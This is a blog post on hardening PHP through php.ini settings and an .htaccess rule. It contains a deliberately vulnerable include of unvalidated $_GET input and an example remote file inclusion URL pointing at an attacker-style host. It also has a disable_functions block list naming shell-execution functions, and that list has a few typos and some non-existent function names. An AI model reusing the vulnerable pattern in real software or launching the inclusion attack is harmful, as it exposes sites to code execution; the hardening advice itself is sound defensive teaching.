PHP.INI Based Web Security

Hardening PHP Security: A PHP developer needs to secure the website in two layers. One is application and the second one is a server. You will have to identify the weakest link to start. A mantra is, we should not trust anything including current server/application configuration and most importantly user data.

Why Attack Happens:
1- Theft of others session
2- Reduce the website credibility
3- Stealing visitor information and browsing habits
4- Information stored in the database
5- Deny user access to website resources
6- Spreading malicious code by injecting the code in user’s computer.

To overcome this problem, below are some security hack A PHP developer can add in the php.ini file.
1- Prevent Information Disclosure:
display_error = off //syntax
You can make it ‘on’ only on the Development environment. It should be ‘off’ in the production environment. An attacker can use this to get valuable information about your file system. An attacker can understand your code, framework used and vulnerability by seeing the error message on the server.

2- Disable Globals
register_globals = off //syntax
To understand this first, we need to understand the global variable in PHP. PHP global variable is those variables which can be accessed from anywhere regardless of the scope. It could be accessible from any PHP file without including any other file.
$GLOBALS
$_SERVER
$_REQUEST
$_POST
$_GET
$_FILES
$_ENV
$_COOKIE
$_SESSION
Think about a scenario where register global is on. Assume that in system there is a session variable $_SESSION[‘user_id’].
If the register globals is on, a hacker can access the variable directly without accessing the $_SESSION[‘user_id’]. A hacker can also get user session only by injecting $user_id in the code and this way a hacker can override global variable.

3- Disable Remote File Includes.
Suggested Setting
allow_url_fopen = off //syntax
allow_url_include = off //syntax
A large number of code injection vulnerabilities reported in PHP-based web applications is due to enabling allow_url_fopen and bad input filtering.
Consider a PHP file named index.php which has following code.
<?php
$icnludeFile = $_GET[‘file_name’]
include($icnludeFile);
?>
In this case, if no input validation is in place, Hacker can exploit this vulnerability by running the URL
http://example.com/index.php?file_name=http://hackerfile.com/remote_file
Disable PHP execution in a directory where the user uploads the file:
Here the user can add two layers of security (Client/Server).
1- check the file extension on the client side.
2- check the file extension and size on the server side.
3- We can restrict the user to upload the executable file using the htaccess
php_flag engine off
<Directory /var/www/vhosts/yourdomain.com/httpdocs/your_upload_dir/>
Options None
AllowOverride None
php_flag engine off
order deny,allow
deny from all
</Directory>

Http Only Cookie: We can restrict access of cookie to the client browser by using HTTP only cookie flag.
session.cookie_httponly = 1 //syntax
Above can also set by below PHP function.
<?php
setcookie(name,value,expire,path,domain,secure,httponly);
?>
But in above case developer can forget to set httponly =1. It is better to have a server side setting in php.ini instead of trusting the developer every time while he is setting the PHP cookie.

Session Save Path: Session save path on the server should not be something like that hacker can directly access it.
It would be something Like session.save_path = /var/lib/php

Disable Unnecessary Functions:
PHP includes many functions that you will likely never need to use. However, they could be very helpful to hackers, disabling them likely will not affect your site, but will help make the hacker’s job much more difficult.
disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace,
tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file,
source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid,
posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin,
posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid,
posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo,
posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid,
posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice,phpinfo

In my next post, I will try to explain some security setting which we can add in Apache configuration file.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.